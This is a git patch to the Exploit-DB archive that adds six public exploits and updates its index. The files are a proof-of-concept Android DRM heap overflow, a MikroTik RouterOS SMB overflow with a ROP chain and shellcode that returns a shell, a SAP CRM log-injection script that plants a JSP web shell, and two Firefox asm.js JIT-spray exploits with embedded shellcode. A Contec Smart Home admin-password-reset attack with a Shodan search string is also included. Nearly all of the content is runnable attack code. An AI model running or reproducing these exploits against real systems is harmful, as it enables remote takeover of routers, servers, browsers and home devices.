From b0fc7bfd43c9533acb3256ff45f38f82717f8394 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 17 Mar 2018 05:01:46 +0000
Subject: [PATCH] DB: 2018-03-17

6 changes to exploits/shellcodes

Android DRM Services - Buffer Overflow
MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer Overflow
SAP NetWeaver AS JAVA CRM -  Log injection Remote Command Execution
Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution
Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution

Spring Data REST < 2.6.9 (Ingalls SR9)_ 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution
Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution
Contec Smart Home 4.15 - Unauthorized Password Reset
---
 exploits/android/dos/44291.cpp      |  95 +++++++++++++++
 exploits/hardware/remote/44290.py   |  90 +++++++++++++++
 exploits/hardware/webapps/44295.txt |  30 +++++
 exploits/windows/remote/44292.py    | 141 +++++++++++++++++++++++
 exploits/windows/remote/44293.html  | 165 ++++++++++++++++++++++++++
 exploits/windows/remote/44294.html  | 172 ++++++++++++++++++++++++++++
 files_exploits.csv                  |   8 +-
 7 files changed, 700 insertions(+), 1 deletion(-)
 create mode 100644 exploits/android/dos/44291.cpp
 create mode 100755 exploits/hardware/remote/44290.py
 create mode 100644 exploits/hardware/webapps/44295.txt
 create mode 100755 exploits/windows/remote/44292.py
 create mode 100644 exploits/windows/remote/44293.html
 create mode 100644 exploits/windows/remote/44294.html

diff --git a/exploits/android/dos/44291.cpp b/exploits/android/dos/44291.cpp
new file mode 100644
index 000000000..e421e54cf
--- /dev/null
+++ b/exploits/android/dos/44291.cpp
@@ -0,0 +1,95 @@
+#include <utils/StrongPointer.h>
+#include <binder/IServiceManager.h>
+#include <binder/MemoryHeapBase.h>
+#include <binder/MemoryBase.h>
+#include <binder/IMemory.h>
+#include <media/ICrypto.h>
+#include <media/IMediaDrmService.h>
+#include <media/hardware/CryptoAPI.h>
+
+#include <stdio.h>
+#include <unistd.h>
+
+using namespace android;
+
+static sp<ICrypto> getCrypto()
+{
+    sp<IServiceManager> sm = defaultServiceManager();
+    sp<IBinder> binder = sm->getService(String16("media.drm"));
+    sp<IMediaDrmService> service = interface_cast<IMediaDrmService>(binder);
+    if (service == NULL) {
+        fprintf(stderr, "Failed to retrieve 'media.drm' service.\n");
+        return NULL;
+    }
+    sp<ICrypto> crypto = service->makeCrypto();
+    if (crypto == NULL) {
+        fprintf(stderr, "makeCrypto failed.\n");
+        return NULL;
+    }
+    return crypto;
+}
+
+static bool setClearKey(sp<ICrypto> crypto)
+{
+    // A UUID which identifies the ClearKey DRM scheme.
+    const uint8_t clearkey_uuid[16] = {
+        0x10, 0x77, 0xEF, 0xEC, 0xC0, 0xB2, 0x4D, 0x02,
+        0xAC, 0xE3, 0x3C, 0x1E, 0x52, 0xE2, 0xFB, 0x4B
+    };
+    if (crypto->createPlugin(clearkey_uuid, NULL, 0) != OK) {
+        fprintf(stderr, "createPlugin failed.\n");
+        return false;
+    }
+    return true;
+}
+
+#define DATA_SIZE (0x2000)
+#define DEST_OFFSET (1)
+
+static void executeOverflow()
+{
+    // Get an interface to a remote CryptoHal object.
+    sp<ICrypto> crypto = getCrypto();
+    if (crypto == NULL) {
+        return;
+    }
+
+    if (!setClearKey(crypto)) {
+        return;
+    }
+
+    // From here we're done with the preparations and go into the
+    // vulnerability PoC.
+
+    sp<MemoryHeapBase> heap = new MemoryHeapBase(DATA_SIZE);
+    // This line is to merely show that we have full control over the data
+    // written in the overflow.
+    memset(heap->getBase(), 'A', DATA_SIZE);
+    sp<MemoryBase> sourceMemory = new MemoryBase(heap, 0, DATA_SIZE);
+    sp<MemoryBase> destMemory = new MemoryBase(heap, DATA_SIZE - DEST_OFFSET,
+        DEST_OFFSET);
+    int heapSeqNum = crypto->setHeap(heap);
+    if (heapSeqNum < 0) {
+        fprintf(stderr, "setHeap failed.\n");
+        return;
+    }
+
+    CryptoPlugin::Pattern pattern = { .mEncryptBlocks = 0, .mSkipBlocks = 1 };
+    ICrypto::SourceBuffer source = { .mSharedMemory = sourceMemory,
+        .mHeapSeqNum = heapSeqNum };
+    // mNumBytesOfClearData is the actual size of data to be copied.
+    CryptoPlugin::SubSample subSamples[] = { {
+        .mNumBytesOfClearData = DATA_SIZE, .mNumBytesOfEncryptedData = 0 } };
+    ICrypto::DestinationBuffer destination = {
+        .mType = ICrypto::kDestinationTypeSharedMemory, .mHandle = NULL,
+        .mSharedMemory = destMemory };
+
+    printf("decrypt result = %zd\n", crypto->decrypt(NULL, NULL,
+        CryptoPlugin::kMode_Unencrypted, pattern, source, 0, subSamples,
+        ARRAY_SIZE(subSamples), destination, NULL));
+}
+
+int main() {
+    executeOverflow();
+    return 0;
+}
\ No newline at end of file
diff --git a/exploits/hardware/remote/44290.py b/exploits/hardware/remote/44290.py
new file mode 100755
index 000000000..0a04b9cc3
--- /dev/null
+++ b/exploits/hardware/remote/44290.py
@@ -0,0 +1,90 @@
+#!/usr/bin/env python
+
+import socket
+import struct
+import sys
+import telnetlib
+
+NETBIOS_SESSION_MESSAGE = "\x00"
+NETBIOS_SESSION_REQUEST = "\x81"
+NETBIOS_SESSION_FLAGS = "\x00"
+
+# trick from http://shell-storm.org/shellcode/files/shellcode-881.php
+# will place the socket file descriptor in eax
+find_sock_fd = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48"
+
+# dup stdin-stdout-stderr so we can reuse the existing connection
+dup_fds = "\x89\xc3\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9"
+
+# execve - cannot pass the 2nd arg as NULL or busybox will complain
+execve_bin_sh = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
+
+# build shellcode
+shellcode = find_sock_fd + dup_fds + execve_bin_sh
+
+# rop to mprotect and make the heap executable
+# the heap base is not being subject to ASLR for whatever reason, so let's take advantage of it
+p = lambda x : struct.pack('I', x)
+
+rop = ""
+rop += p(0x0804c39d) # 0x0804c39d: pop ebx; pop ebp; ret; 
+rop += p(0x08072000) # ebx -> heap base
+rop += p(0xffffffff) # ebp -> gibberish
+rop += p(0x080664f5) # 0x080664f5: pop ecx; adc al, 0xf7; ret; 
+rop += p(0x14000)    # ecx -> size for mprotect
+rop += p(0x08066f24) # 0x08066f24: pop edx; pop edi; pop ebp; ret; 
+rop += p(0x00000007) # edx -> permissions for mprotect -> PROT_READ | PROT_WRITE | PROT_EXEC
+rop += p(0xffffffff) # edi -> gibberish
+rop += p(0xffffffff) # ebp -> gibberish
+rop += p(0x0804e30f) # 0x0804e30f: pop ebp; ret; 
+rop += p(0x0000007d) # ebp -> mprotect system call
+rop += p(0x0804f94a) # 0x0804f94a: xchg eax, ebp; ret; 
+rop += p(0xffffe42e) # 0xffffe42e; int 0x80; pop ebp; pop edx; pop ecx; ret - from vdso - not affected by ASLR
+rop += p(0xffffffff) # ebp -> gibberish
+rop += p(0x0)	     # edx -> zeroed out
+rop += p(0x0)	     # ecx -> zeroed out
+rop += p(0x0804e30f) # 0x0804e30f: pop ebp; ret; 
+rop += p(0x08075802) # ebp -> somewhere on the heap that will (always?) contain user controlled data
+rop += p(0x0804f94a) # 0x0804f94a: xchg eax, ebp; ret;
+rop += p(0x0804e153) # jmp eax; - jump to our shellcode on the heap
+
+offset_to_regs = 83
+
+# we do not really care about the initial register values other than overwriting the saved ret address
+ebx = p(0x45454545)
+esi = p(0x45454545)
+edi = p(0x45454545)
+ebp = p(0x45454545)
+eip = p(0x0804886c) # 0x0804886c: ret;
+
+payload = "\xff" * offset_to_regs + ebx + esi + edi + ebp + eip + rop
+header = struct.pack("!ccH", NETBIOS_SESSION_REQUEST, NETBIOS_SESSION_FLAGS, len(payload))
+buf = header + payload
+
+def open_connection(ip):
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((ip, 139))
+    return s
+
+def store_payload(s):
+    print "[+] storing payload on the heap"
+    s.send((NETBIOS_SESSION_MESSAGE + "\x00\xeb\x02") * 4000 + "\x90" * 16 + shellcode)
+
+def crash_smb(s):
+    print "[+] getting code execution"
+    s.send(buf)
+
+if __name__ == "__main__":
+    if len(sys.argv) != 2:
+        print "%s ip" % sys.argv[0]
+        sys.exit(1)
+
+    s = open_connection(sys.argv[1])
+    store_payload(s)
+
+    # the server closes the first connection, so we need to open another one
+    t = telnetlib.Telnet()
+    t.sock = open_connection(sys.argv[1])
+    crash_smb(t.sock)
+    print "[+] got shell?"
+    t.interact()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/44295.txt b/exploits/hardware/webapps/44295.txt
new file mode 100644
index 000000000..0a16a0728
--- /dev/null
+++ b/exploits/hardware/webapps/44295.txt
@@ -0,0 +1,30 @@
+# Title              : Contec smart home 4.15 Unauthorized Password Reset
+# Shodan Dork		 : "content/smarthome.php"
+# Vendor Homepage    : http://contec.co.il
+# Tested on          : Google Chrome
+# Tested version     : 4.15
+# Date               : 2018-03-14
+# Author             : Z3ro0ne
+# Contact            : saadousfar59@gmail.com
+# Facebook Page      : https://www.facebook.com/Z3ro0ne
+ 
+# Vulnerability description :
+the Vulnerability allow unauthenticated attacker to remotely bypass authentication and change admin password without old password and control (lamps,doors,air conditioner...)
+
+
+# Exploit 
+
+ To Reset Admin password 
+ http://Ipaddress:port/content/new_user.php?user_name=ADMIN&password=NEWPASSWORD&group_id=1
+ 
+ To Create a new user
+ http://Ipaddress:port/content/new_user.php?user_name=NEWUSER&password=NEWPASSWORD&group_id=1
+ 
+  To edit a user
+ http://Ipaddress:port/content/edit_user.php?user_name=USER&password=NEWPASSWORD&group_id=1
+ 
+ To Delete a user 
+ http://Ipaddress:port/content/delete_user.php?user_name=USER
+ 
+ Users list  
+ http://Ipaddress:port/content/user.php
\ No newline at end of file
diff --git a/exploits/windows/remote/44292.py b/exploits/windows/remote/44292.py
new file mode 100755
index 000000000..2091db710
--- /dev/null
+++ b/exploits/windows/remote/44292.py
@@ -0,0 +1,141 @@
+#!/usr/bin/env python
+import argparse
+import urllib
+
+import requests, random
+from bs4 import BeautifulSoup
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+help_desc = '''
+PoC of Remote Command Execution via Log injection on SAP CRM
+-- ERPScan
+
+python crm_rce.py --ssl --host 127.0.0.1 --port 50000 --username administrator --password 06071992 --SID DM0 --ssl true
+'''
+baner = '''
+ _______  _______  _______  _______  _______  _______  _
+(  ____ \(  ____ )(  ____ )(  ____ \(  ____ \(  ___  )( (    /|
+| (    \/| (    )|| (    )|| (    \/| (    \/| (   ) ||  \  ( |
+| (__    | (____)|| (____)|| (_____ | |      | (___) ||   \ | |
+|  __)   |     __)|  _____)(_____  )| |      |  ___  || (\ \) |
+| (      | (\ (   | (            ) || |      | (   ) || | \   |
+| (____/\| ) \ \__| )      /\____) || (____/\| )   ( || )  \  |
+(_______/|/   \__/|/       \_______)(_______/|/     \||/    )_)
+Vahagn @vah_13 Vardanian
+Bob @NewFranny
+CVE-2018-2380
+
+'''
+
+
+def start(ip, port, username, password, sid, ssl):
+    if ssl == None:
+        base_scheme = 'http'
+    else:
+        base_scheme = 'https'
+    req_adapter = requests.session()
+    _server_ip_port = "{0}:{1}".format(ip, port)
+    _username = username
+    admin_password = password
+    _headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0",
+                "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+                "Referer": "{0}://{1}/b2b/admin/logging.jsp?location=com.sap.isa&mode=edit&index=1".format(
+                    base_scheme,_server_ip_port)
+                }
+
+    # shell name
+    _shell_name = "ERPScan_shell_{0}".format(random.randint(1337, 31337))
+
+    # shell_code
+    shell_code = '''
+        <%@ page import="java.util.*,java.io.*"%>
+        <% 
+        if (request.getParameter("cmd") != null) {
+            out.println("Command: " + request.getParameter("cmd") + "<BR>");
+            Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
+            OutputStream os = p.getOutputStream();
+            InputStream in = p.getInputStream();
+            DataInputStream dis = new DataInputStream(in);
+            String disr = dis.readLine();
+            while ( disr != null ) {
+                out.println(disr);
+                disr = dis.readLine();
+           }    
+        }
+        %>
+        '''
+    # urls variables
+    _irj_portal = "{0}://{1}/irj/portal".format(base_scheme,_server_ip_port)
+    _b2b_admin_url = "{0}://{1}/b2b/admin/index.jsp".format(base_scheme,_server_ip_port)
+    _url_of_log_path = "{0}://{1}/b2b/admin/logging.jsp".format(base_scheme,_server_ip_port)
+    _url_write_shell_to_log_file = "{0}://{1}/b2b/init.do?\"%22]{2}[%22\"".format(base_scheme,_server_ip_port,urllib.quote_plus(shell_code))
+
+    # data variable
+    _post_data_restore_log_path = {"selConfigName": "com.sap.isa",
+                                   "selSeverity": "0",
+                                   "selDest": "./default_log_name.log",
+                                   "selLimit": "10485760",
+                                   "selCount": "20",
+                                   "selFormatterType": "ListFormat",
+                                   "selPattern": "none",
+                                   "mode": "save",
+                                   "selLocationIdx": "1"}
+    _post_data_to_change_log_path = {"selConfigName": "com.sap.isa",
+                                     "selSeverity": "0",
+                                     "selDest": "C:\\usr\\sap\\{0}\\J00\\j2ee\\cluster\\apps\\sap.com\\com.sap.engine.docs.examples\\servlet_jsp\\_default\\root\\{1}.jsp".format(sid, _shell_name),
+                                     "selLimit": "10485760",
+                                     "selCount": "20",
+                                     "selFormatterType": "ListFormat",
+                                     "selPattern": "none",
+                                     "mode": "save",
+                                     "selLocationIdx": "1"}
+
+    print("{0} \n[!] Try to get RCE using log injection ".format(baner))
+
+    print("[!] Get j_salt token for requests")
+    res = requests.get(_irj_portal, headers=_headers, verify=False)
+    soup = BeautifulSoup(res.text, "html.parser")
+    e = soup.find("input", {"name": "j_salt"})
+    __j_salt = e['value']
+
+    print("[!] Login to the SAP portal")
+    req_adapter.post(_b2b_admin_url,
+                     headers=_headers,
+                     data={"login_submit": "on", "login_do_redirect": "1", "j_salt": __j_salt,
+                           "j_username": "{0}".format(_username), "j_password": "{0}".format(admin_password),
+                           "uidPasswordLogon": "Log On"}, verify=False)
+
+    print("[!] Change log path ")
+    req_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_to_change_log_path)
+
+    print("[!] Upload \"Runtime.getRuntime().exec(request.getParameter(\"cmd\")) \" shell to {0}://{1}/{2}.0.jsp?cmd=ipconfig".format(base_scheme,_server_ip_port, _shell_name))
+    req_adapter.get(_url_write_shell_to_log_file, headers=_headers)
+
+    print("[!] Restore logs path to ./default_log_name.log")
+    req_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_restore_log_path)
+
+    print("[!] Enjoy!")
+
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description=help_desc, formatter_class=argparse.RawTextHelpFormatter)
+    parser.add_argument('-H', '--host', default='127.0.0.1', help='SAP host to send requests to')
+    parser.add_argument('-p', '--port', default=50000, type=int, help='SAP host port')
+
+    parser.add_argument('-u', '--username', help='SAP CRM administrator')
+    parser.add_argument('-pwd', '--password', help='SAP CRM administrator password')
+
+    parser.add_argument('-s', '--SID', help='SAP SID')
+    parser.add_argument('-S', '--ssl', help='Use ssl connection')
+
+    args = parser.parse_args()
+    args_dict = vars(args)
+
+    host = args_dict['host']
+    port = args_dict['port']
+    username = args_dict['username']
+    password = args_dict['password']
+    sid = args_dict['SID']
+    ssl = args.ssl
+    start(host, port, username, password, sid, ssl)
\ No newline at end of file
diff --git a/exploits/windows/remote/44293.html b/exploits/windows/remote/44293.html
new file mode 100644
index 000000000..d0953a7b4
--- /dev/null
+++ b/exploits/windows/remote/44293.html
@@ -0,0 +1,165 @@
+<!DOCTYPE HTML>
+
+<!--
+
+    FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
+    *PoC* Exploit against Firefox 46.0.1 (CVE-2016-2819)
+    ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018
+
+    Tested on:
+    Firefox 46.0.1 32-bit - Windows 10 1709
+    https://ftp.mozilla.org/pub/firefox/releases/46.0.1/win32/en-US/Firefox%20Setup%2046.0.1.exe
+
+    Howto:
+    1) serve PoC over network and open it in Firefox 46.0.1 32-bit
+    2) A successfull exploit attempt should pop calc.exe
+
+    Mozilla Bug Report:
+    https://bugzilla.mozilla.org/show_bug.cgi?id=1270381
+
+
+    Writeup: 
+    https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/
+
+
+    - For research purposes only -
+    
+    (C) Rh0
+
+    Mar. 13, 2018
+
+-->
+
+<title>CVE-2016-2819 and ASM.JS JIT-Spray</title>
+<head>
+<meta charset=UTF-8 />
+<script>
+"use strict"
+
+var Exploit = function(){
+    this.asmjs = new Asmjs()
+    this.heap = new Heap()
+}
+
+Exploit.prototype.go = function(){
+    /* target address of fake node object */
+    var node_target_addr = 0x5a500000 
+
+    /* target address of asm.js float pool payload*/
+    var target_eip = 0x20200b58
+
+    /* spray asm.js float constant pools */
+    this.asmjs.spray_float_payload(0x1000)
+
+    /* spray fake Node objects */
+    this.heap.spray(node_target_addr, target_eip)
+
+    /* go! */
+    this.trigger_vuln(node_target_addr)
+};
+
+
+Exploit.prototype.trigger_vuln = function(node_ptr){
+    document.body.innerHTML = '<table><svg><div id="BBBB">'
+    this.heap.gc()
+    var a = new Array() 
+    for (var i=0; i < 0x10100; i++){
+        /* array element (Node object ptr) control with integer underflow */
+        a[i] = new Uint32Array(0x100/4)
+        for (var j=0; j<0x100/4; j++)
+            a[i][j] = node_ptr 
+    }
+
+    /* original crashing testcase
+    document.getElementById('BBBB').outerHTML = '<tr><title><ruby><template><table><template><td><col><em><table></tr><th></tr></td></table>hr {}</style>'
+    */
+
+    /* easier to exploit codepath */
+    document.getElementById('BBBB').outerHTML = '<tr><title><ruby><template><table><template><td><col><em><table></tr><th></tr></td></table>hr {}<DD>'
+
+    window.location.reload()
+};
+
+
+var Asmjs = function(){};
+
+Asmjs.prototype.asm_js_module = function(stdlib, ffi){
+    "use asm"
+    var foo = ffi.foo
+    function payload(){
+        var val = 0.0
+        /* Fx 46.0.1 float constant pool of size 0xc0 is at 0xXXXX0b58*/
+        val = +foo(
+            // $ msfvenom --payload windows/exec CMD=calc.exe # transformed with sc2asmjs.py
+            -1.587865768352248e-263,
+            -8.692422460804815e-255,
+            7.529882109376901e-114,
+            2.0120602207293977e-16,
+            3.7204662687249914e-242,
+            4.351158092040946e+89,
+            2.284741716118451e+270,
+            7.620699014501263e-153,
+            5.996021286047645e+44,
+            -5.981935902612295e-92,
+            6.23540918304361e+259,
+            1.9227873281657598e+256,
+            2.0672493951546363e+187,
+            -6.971032919585734e+91,
+            5.651413300798281e-134,
+            -1.9040061366251406e+305,
+            -1.2687640718807038e-241,
+            9.697849844423e-310,
+            -2.0571400761625145e+306,
+            -1.1777948610587587e-123,
+            2.708909852013898e+289,
+            3.591750823735296e+37,
+            -1.7960516725035723e+106,
+            6.326776523166028e+180
+        )
+        return +val;
+    }
+    return payload
+};
+
+Asmjs.prototype.spray_float_payload = function(regions){
+    this.modules = new Array(regions).fill(null).map(
+        region => this.asm_js_module(window, {foo: () => 0})
+    )
+};
+
+var Heap = function(target_addr, eip){
+    this.node_heap = []
+};
+
+
+Heap.prototype.spray = function(node_target_addr, target_eip){
+    var junk = 0x13371337
+    var current_address = 0x20000000
+    var block_size = 0x1000000
+    while(current_address < node_target_addr){
+        var fake_objects = new Uint32Array(block_size/4 - 0x100)
+        for (var offset = 0; offset < block_size; offset += 0x100000){
+            /* target Node object needed to control EIP  */
+            fake_objects[offset/4 + 0x00/4] = 0x29 
+            fake_objects[offset/4 + 0x0c/4] = 3
+            fake_objects[offset/4 + 0x14/4] = node_target_addr + 0x18
+            fake_objects[offset/4 + 0x18/4] = 1
+            fake_objects[offset/4 + 0x1c/4] = junk
+            fake_objects[offset/4 + 0x20/4] = node_target_addr + 0x24
+            fake_objects[offset/4 + 0x24/4] = node_target_addr + 0x28
+            fake_objects[offset/4 + 0x28/4] = node_target_addr + 0x2c
+            fake_objects[offset/4 + 0x2c/4] = target_eip 
+        }
+        this.node_heap.push(fake_objects)
+        current_address += block_size
+    }
+};
+
+Heap.prototype.gc = function(){
+    for (var i=0; i<=10; i++)
+        var x = new ArrayBuffer(0x1000000)
+};
+
+</script>
+<head>
+<body onload='exploit = new Exploit(); exploit.go()' />
\ No newline at end of file
diff --git a/exploits/windows/remote/44294.html b/exploits/windows/remote/44294.html
new file mode 100644
index 000000000..299b32592
--- /dev/null
+++ b/exploits/windows/remote/44294.html
@@ -0,0 +1,172 @@
+<!DOCTYPE HTML>
+
+<!--
+
+    FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
+    *PoC* Exploit against Firefox 44.0.2 (CVE-2016-1960)
+    ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018
+
+    Tested on:
+    Firefox 44.0.2 32-bit - Windows 10 1709
+    https://ftp.mozilla.org/pub/firefox/releases/44.0.2/win32/en-US/Firefox%20Setup%2044.0.2.exe
+
+    Howto:
+    1) serve PoC over network and open it in Firefox 44.0.2 32-bit
+    2) A successfull exploit attempt should pop calc.exe
+
+    Mozilla Bug Report:
+    https://bugzilla.mozilla.org/show_bug.cgi?id=1246014
+
+
+    Writeup: 
+    https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/
+
+
+    - For research purposes only -
+    
+    (C) Rh0
+
+    Mar. 13, 2018
+
+    Notes:
+    *) very similar to CVE-2016-2819, but still different:
+    *) this PoC (CVE-2016-1960) does trigger in 44.0.2 but not in 46.0.1
+       because in 46.0.1 it is already fixed.
+    *) CVE-2016-2819 does trigger the same bug in 44.0.2 and 46.0.1 because it
+       was fixed in Firefox > 46.0.1
+
+-->
+
+<title>CVE-2016-1960 and ASM.JS JIT-Spray</title>
+<head>
+<meta charset=UTF-8 />
+<script>
+"use strict"
+
+var Exploit = function(){
+    this.asmjs = new Asmjs()
+    this.heap = new Heap()
+}
+
+Exploit.prototype.go = function(){
+    /* target address of fake node object */
+    var node_target_addr = 0x20200000 
+
+    /* target address of asm.js float pool payload*/
+    var target_eip = 0x3c3c1dc8
+
+    /* spray fake Node objects */
+    this.heap.spray(node_target_addr, target_eip)
+
+    /* spray asm.js float constant pools */
+    this.asmjs.spray_float_payload(0x1800)
+
+    /* go! */
+    this.trigger_vuln(node_target_addr)
+};
+
+
+Exploit.prototype.trigger_vuln = function(node_ptr){
+    document.body.innerHTML = '<table><svg><div id="AAAA">'
+    this.heap.gc()
+    var a = new Array() 
+    for (var i=0; i < 0x11000; i++){
+        /* array element (Node object ptr) control with integer underflow */
+        a[i] = new Uint32Array(0x100/4)
+        for (var j=0; j<0x100/4; j++)
+            a[i][j] = node_ptr 
+    }
+
+    /* original crashing testcase
+    document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td</style>';
+    */
+
+    /* easier to exploit codepath */
+    document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td<DD>';
+
+    window.location.reload()
+};
+
+
+var Asmjs = function(){};
+
+Asmjs.prototype.asm_js_module = function(stdlib, ffi){
+    "use asm"
+    var foo = ffi.foo
+    function payload(){
+        var val = 0.0
+        /* Fx 44.0.2 float constant pool of size 0xc0 is at 0xXXXX1dc8*/
+        val = +foo(
+            // $ msfvenom --payload windows/exec CMD=calc.exe # transformed with sc2asmjs.py
+            -1.587865768352248e-263,
+            -8.692422460804815e-255,
+            7.529882109376901e-114,
+            2.0120602207293977e-16,
+            3.7204662687249914e-242,
+            4.351158092040946e+89,
+            2.284741716118451e+270,
+            7.620699014501263e-153,
+            5.996021286047645e+44,
+            -5.981935902612295e-92,
+            6.23540918304361e+259,
+            1.9227873281657598e+256,
+            2.0672493951546363e+187,
+            -6.971032919585734e+91,
+            5.651413300798281e-134,
+            -1.9040061366251406e+305,
+            -1.2687640718807038e-241,
+            9.697849844423e-310,
+            -2.0571400761625145e+306,
+            -1.1777948610587587e-123,
+            2.708909852013898e+289,
+            3.591750823735296e+37,
+            -1.7960516725035723e+106,
+            6.326776523166028e+180
+        )
+        return +val;
+    }
+    return payload
+};
+
+Asmjs.prototype.spray_float_payload = function(regions){
+    this.modules = new Array(regions).fill(null).map(
+        region => this.asm_js_module(window, {foo: () => 0})
+    )
+};
+
+var Heap = function(target_addr, eip){
+    this.node_heap = []
+};
+
+
+Heap.prototype.spray = function(node_target_addr, target_eip){
+    var junk = 0x13371337
+    var current_address = 0x08000000
+    var block_size = 0x1000000
+    while(current_address < node_target_addr){
+        var fake_objects = new Uint32Array(block_size/4 - 0x100)
+        for (var offset = 0; offset < block_size; offset += 0x100000){
+            /* target Node object needed to control EIP  */
+            fake_objects[offset/4 + 0x00/4] = 0x29 
+            fake_objects[offset/4 + 0x0c/4] = 3
+            fake_objects[offset/4 + 0x14/4] = node_target_addr + 0x18
+            fake_objects[offset/4 + 0x18/4] = 1
+            fake_objects[offset/4 + 0x1c/4] = junk
+            fake_objects[offset/4 + 0x20/4] = node_target_addr + 0x24
+            fake_objects[offset/4 + 0x24/4] = node_target_addr + 0x28
+            fake_objects[offset/4 + 0x28/4] = node_target_addr + 0x2c
+            fake_objects[offset/4 + 0x2c/4] = target_eip 
+        }
+        this.node_heap.push(fake_objects)
+        current_address += block_size
+    }
+};
+
+Heap.prototype.gc = function(){
+    for (var i=0; i<=10; i++)
+        var x = new ArrayBuffer(0x1000000)
+};
+
+</script>
+<head>
+<body onload='exploit = new Exploit(); exploit.go()' />
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 955f27f3e..30dfae0be 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5900,6 +5900,7 @@ id,file,description,date,author,type,platform,port
 44265,exploits/linux/dos/44265.py,"Memcached 1.5.5 - 'Memcrashed ' Insufficient Control of Network Message Volume Denial of Service With Shodan API",2018-03-08,649,dos,linux,11211
 44268,exploits/android/dos/44268.txt,"Broadcom BCM43xx Wi-Fi  - 'BroadPWN' Denial of Service",2016-12-01,649,dos,android,
 44271,exploits/windows/dos/44271.py,"WebLog Expert Enterprise 9.4 - Denial of Service",2018-03-09,hyp3rlinx,dos,windows,
+44291,exploits/android/dos/44291.cpp,"Android DRM Services - Buffer Overflow",2018-03-15,"Tamir Zahavi-Brunner",dos,android,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -16324,6 +16325,10 @@ id,file,description,date,author,type,platform,port
 44280,exploits/multiple/remote/44280.rb,"Eclipse Equinoxe OSGi Console - Command Execution (Metasploit)",2018-03-12,Metasploit,remote,multiple,
 44283,exploits/hardware/remote/44283.py,"MikroTik RouterOS < 6.38.4 (MIPSBE) - 'Chimay Red' Stack Clash Remote Code Execution",2018-03-12,"Lorenzo Santina",remote,hardware,
 44284,exploits/hardware/remote/44284.py,"MikroTik RouterOS < 6.38.4 (x86) - 'Chimay Red' Stack Clash Remote Code Execution",2018-03-12,"Lorenzo Santina",remote,hardware,
+44290,exploits/hardware/remote/44290.py,"MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer Overflow",2018-03-15,CoreLabs,remote,hardware,
+44292,exploits/windows/remote/44292.py,"SAP NetWeaver AS JAVA CRM -  Log injection Remote Command Execution",2018-03-14,"erp scan team",remote,windows,
+44293,exploits/windows/remote/44293.html,"Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows,
+44294,exploits/windows/remote/44294.html,"Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39001,4 +39006,5 @@ id,file,description,date,author,type,platform,port
 44285,exploits/aspx/webapps/44285.txt,"SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities",2018-03-13,"SEC Consult",webapps,aspx,
 44286,exploits/php/webapps/44286.txt,"Tuleap 9.17.99.189 - Blind SQL Injection",2018-03-13,"Cristiano Maruti",webapps,php,
 44288,exploits/php/webapps/44288.txt,"WordPress Plugin Duplicator 1.2.32 - Cross-Site Scripting",2018-03-15,"Stefan Broeder",webapps,php,80
-44289,exploits/java/webapps/44289.java,"Spring Data REST < 2.6.9 (Ingalls SR9)_ 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution",2018-03-15,"Antonio Francesco Sardella",webapps,java,
+44289,exploits/java/webapps/44289.java,"Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution",2018-03-15,"Antonio Francesco Sardella",webapps,java,
+44295,exploits/hardware/webapps/44295.txt,"Contec Smart Home 4.15 - Unauthorized Password Reset",2018-03-16,Z3ro0ne,webapps,hardware,